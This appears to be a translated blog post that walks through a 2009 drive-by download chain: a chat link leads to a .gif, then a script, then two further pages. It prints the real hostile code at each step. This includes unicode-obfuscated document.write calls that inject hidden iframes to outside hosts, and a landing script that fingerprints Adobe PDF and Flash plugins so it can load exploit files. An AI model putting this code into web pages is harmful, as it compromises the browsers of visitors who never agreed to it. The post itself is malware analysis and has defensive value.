07/31/2009 18:45:11 xyz : see hxxp: //watnhome.com/images/car.gif :)
view-source:hxxp://watnhome.com/images/car.gif
< img src ="WorleyVision5.jpg" >
< script type ="text/javascript" src ="js.js" ></ script >
view-source:hxxp://watnhome.com/images/js.js
There is a light nonsense:document .write( '\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u006c\u0069\u0073\u0074\u0065\u006e\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e' )
Or, translating into a more readable look ...document .write( '<iframe src="hxxp://listenz.org/stats/ru1.php" style="display:none"></iframe>' )
view-source:hxxp://listenz.org/stats/ru1.php
Yeah, hello from the same author:<script type= "text/javascript" > document .write( '\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0076\u0065\u0072\u0069\u0076\u0065\u006c\u006c\u002e\u0063\u006f\u006d\u002f\u0075\u0070\u0064\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e' )</script>
or a little more readable ...<script type= "text/javascript" > document .write( '<iframe src="hxxp://verivell.com/upd/index.php" style="display:none"></iframe>' )</script>
view-source:hxxp://verivell.com/upd/index.php
<script>
function PDF_SWF_Iframe(sCn)
{
document .write(sCn);
}
if (navigator.userAgent.indexOf( 'MSIE' ) != -1)
{
PDF = new Array( 'AcroPDF.PDF' , 'PDF.PdfCtrl' );
for (i in PDF)
{
try
{
obj = new ActiveXObject(PDF[i]);
if (obj)
{
PDF_SWF_Iframe( '<iframe src=evenLike.pdf></iframe>' );
}
}
catch (e){}
}
try
{
obj = new ActiveXObject( 'ShockwaveFlash.ShockwaveFlash' );
if (obj)
{
PDF_SWF_Iframe( '<iframe src=normalDummyBelief.swf></iframe>' );
}
}
catch (e){}
}
else
{
for (i = 0; i <= navigator.plugins.length; i++)
{
var plugin = navigator.plugins[i].name;
if ((plugin.indexOf( 'Adobe Acrobat' ) != -1) || (plugin.indexOf( 'Adobe PDF' ) != -1))
{
PDF_SWF_Iframe( '<iframe src=evenLike.pdf></iframe>' );
}
if (plugin.indexOf( 'Flash' ) != -1)
{
PDF_SWF_Iframe( '<iframe src=normalDummyBelief.swf></iframe>' );
}
}
}
</script>
* This source code was highlighted with Source Code Highlighter .
Source: https://habr.com/ru/post/65927/
All Articles